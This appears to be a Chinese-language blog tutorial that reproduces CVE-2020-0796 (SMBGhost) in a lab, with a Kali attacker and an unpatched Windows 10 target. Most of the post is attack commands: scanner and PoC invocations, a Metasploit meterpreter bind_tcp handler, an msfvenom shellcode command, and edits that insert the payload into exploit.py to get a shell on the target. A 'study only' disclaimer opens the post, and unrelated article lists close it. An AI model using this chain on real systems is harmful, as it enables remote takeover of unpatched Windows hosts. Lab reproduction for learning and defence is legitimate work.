CVE-2020-0796(永恒之黑)漏洞复现
2024-09-07 06:24:58
声明:仅供学习与参考,请勿用于非法用途(后果自负)
一、影响范围(需关闭 Win10 防火墙):
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows Server, version 1903 (Server Core installation)
- Windows Server, version 1909 (Server Core installation)
二、漏洞复现:
环境准备:
- kali,ip:192.168.201.152(攻击机)
- 受影响版本的Win10,ip:192.168.201.132(须关闭防火墙)
漏洞检测工具下载地址:
- 漏洞检测工具使用方法:
pythone3 scanner.py 192.168.0.0/24
PoC下载地址:
- POC 使用方法:
python3.8 exploit.py -ip 192.168.201.132
三、漏洞复现:
1、先对使用 kali 对 9999 端口进行监听:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.201.132
run
2、kali 使用 msf 生成木马(此处端口需跟监听的端口是一致的)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -b '\x00' -i 1 -f python>test.py
木马生成后的内容为:
下载好的 POC:
3、先把木马的内的 buf 替换为 USER_PAYLOAD ,再替换 exploit.py 内的 USER_PAYLOAD 行的内容
- :set nu // 显示行
- :91,127s/buf/USER_PAYLOAD // 把91-127行的 buf 替换为 USER_PAYLOAD
4、使用 Python3 运行(在此处需按一次回车)
5、此时监听的 9999 端口已收到访反弹的 shell
- // 如未收到反弹的 Shell 则使用 Python 重新运行一次 POC
最新文章
- HLG1116-选美大赛
- 读书笔记 —— 《css秘密花园》
- sysbench压力测试工具简介和使用(二)
- JSONP跨域的原理解析( 一种脚本注入行为)
- 决策树 -- ID3算法小结
- AC日记——计算2的N次方 openjudge 1.6 12
- WebRTC手记之框架与接口
- 在OpenShift云空间上部署java web应用
- 【Unity3D基础教程】给初学者看的Unity教程(七):在Unity中构建健壮的单例模式(Singleton)
- ADO.NET中的DataReader详解
- [翻译][MVC 5 + EF 6] 7:加载相关数据
- Linq中小心使用IndexOf
- 谈谈Ext JS的组件——布局的用法续二
- 14.2.2 InnoDB Multi-Versioning InnoDB 多版本
- tk mybatis通用mapper,复杂and or条件查询
- kubernete 本地持久化存储 kube-controller-manager的日志输出 + pvc pv 概念 -- storageclass 概念
- 使用jieba库与wordcloud库第三方库进行词频统计
- flutter Dialog里ListView的问题
- 2: Eclipse反编译工具Jad及插件JadClipse配置
- javadoc中{@link}与@see的简单使用以及区别
热门文章
- 2020-06-16:Redis hgetall时间复杂度?
- RoBERTa:一个调到最优参的BERT
- 简述python中`functools.wrapper()
- 精讲RestTemplate第7篇-自定义请求失败异常处理
- 生成kafka内部请求与响应的接口文档
- 【服务器部署】Django+宝塔+Nginx_uwsgi部署
- java实现高斯平滑
- NOIP2007 树网的核 [提高组]
- Linux环境下安装Redis数据库
- Kubernetes K8S之资源控制器RC、RS、Deployment详解